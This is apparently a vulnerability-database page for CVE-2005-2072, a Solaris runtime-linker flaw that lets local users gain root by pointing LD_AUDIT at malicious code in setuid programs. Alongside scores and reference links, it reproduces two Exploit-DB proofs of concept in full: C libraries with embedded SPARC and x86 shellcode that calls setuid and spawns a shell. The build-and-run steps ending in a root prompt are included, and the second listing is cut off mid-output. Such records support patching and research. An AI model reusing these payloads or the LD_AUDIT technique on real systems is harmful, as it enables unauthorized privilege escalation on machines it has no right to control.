CVE-2005-2072
published 2005-06-29CVE-2005-2072: The runtime linker (ld.so) in Solaris 8, 9, and 10 trusts the LD_AUDIT environment variable in setuid or setgid programs, which allows local users to gain…
PriorityP426high7.2CVSS 2.0
AVLACLAuNCCICAC
EXPLOIT
EPSS
1.00%
58.4th percentile
The runtime linker (ld.so) in Solaris 8, 9, and 10 trusts the LD_AUDIT environment variable in setuid or setgid programs, which allows local users to gain privileges by (1) modifying LD_AUDIT to reference malicious code and possibly (2) using a long value for LD_AUDIT.
Affected
4 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| sun | solaris | — | — |
| sun | solaris | — | — |
| sun | solaris | — | — |
| sun | sunos | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Solaris 9/10 - 'ld.so' Local Privilege Escalation (2)
exploitdb·2005-06-28
CVE-2005-2072 Solaris 9/10 - 'ld.so' Local Privilege Escalation (2)
Solaris 9/10 - 'ld.so' Local Privilege Escalation (2)
---
/*
Solaris 9 on SPARC:
$ cat dupa.c
*/
char sh[] =
/* setuid() */
"\x90\x08\x3f\xff\x82\x10\x20\x17\x91\xd0\x20\x08"
/* execve() */
"\x20\xbf\xff\xff\x20\xbf\xff\xff\x7f\xff\xff\xff\x90\x03\xe0\x20"
"\x92\x02\x20\x10\xc0\x22\x20\x08\xd0\x22\x20\x10\xc0\x22\x20\x14"
"\x82\x10\x20\x0b\x91\xd0\x20\x08/bin/ksh";
int la_version() {
void (*f)();
f = (void*)sh;
f();
return 3;
}
/*
$ gcc -fPIC -shared -o /tmp/dupa.so dupa.c
$ export LD_AUDIT=/tmp/dupa.so
$ ping
# id
uid=0(root) gid=100(student)
*/
// milw0rm.com [2005-06-28]
Exploit-DB
Solaris 9/10 - 'ld.so' Local Privilege Escalation (1)
exploitdb·2005-06-28
CVE-2005-2072 Solaris 9/10 - 'ld.so' Local Privilege Escalation (1)
Solaris 9/10 - 'ld.so' Local Privilege Escalation (1)
---
/*
- SunOS 5.10 Generic i86pc i386 i86pc
- SunOS 5.9 Generic_112233-12 sun4u
It does NOT work on:
SunOS 5.8 Generic_117350-02 sun4u sparc
Example on unpatched Solaris 10 (AMD64):
atari:venglin:~> cat dupa.c
*/
static char sh[] =
"\x31\xc0\xeb\x09\x5a\x89\x42\x01\x88\x42\x06\xeb\x0d\xe8\xf2\xff\xff\xff\x9a\x01\x01\x01\x01\x07\x01\xc3\x50\xb0\x17\xe8\xf0\xff\xff\xff\x31\xc0\x68\x2f\x73\x68\x5f\x68\x2f\x62\x69\x6e\x88\x44\x24\x07\x89\xe3\x50\x53\x8d\x0c\x24\x8d\x54\x24\x04\x52\x51\x53\xb0\x0b\xe8\xcb\xff\xff\xff";
int la_version() {
void (*f)();
f = (void*)sh;
f();
return 3;
}
/*
atari:venglin:~> gcc -fPIC -shared -o /tmp/dupa.so dupa.c
atari:venglin:~> setenv LD_AUDIT /tmp/dupa.so
atari:venglin:~> su
# id
uid=0(root) gid=10(
No writeups or analysis indexed.
http://lists.grok.org.uk/pipermail/full-disclosure/2005-June/034730.htmlhttp://lists.grok.org.uk/pipermail/full-disclosure/2005-June/034731.htmlhttp://lists.grok.org.uk/pipermail/full-disclosure/2005-June/034738.htmlhttp://secunia.com/advisories/15841http://securitytracker.com/id?1014537http://sunsolve.sun.com/search/document.do?assetkey=1-26-101794-1http://www.opensolaris.org/jive/thread.jspa?messageID=3497http://www.securityfocus.com/bid/14074http://www.vupen.com/english/advisories/2005/0908http://lists.grok.org.uk/pipermail/full-disclosure/2005-June/034730.htmlhttp://lists.grok.org.uk/pipermail/full-disclosure/2005-June/034731.htmlhttp://lists.grok.org.uk/pipermail/full-disclosure/2005-June/034738.htmlhttp://secunia.com/advisories/15841http://securitytracker.com/id?1014537http://sunsolve.sun.com/search/document.do?assetkey=1-26-101794-1http://www.opensolaris.org/jive/thread.jspa?messageID=3497http://www.securityfocus.com/bid/14074http://www.vupen.com/english/advisories/2005/0908
2005-06-29
Published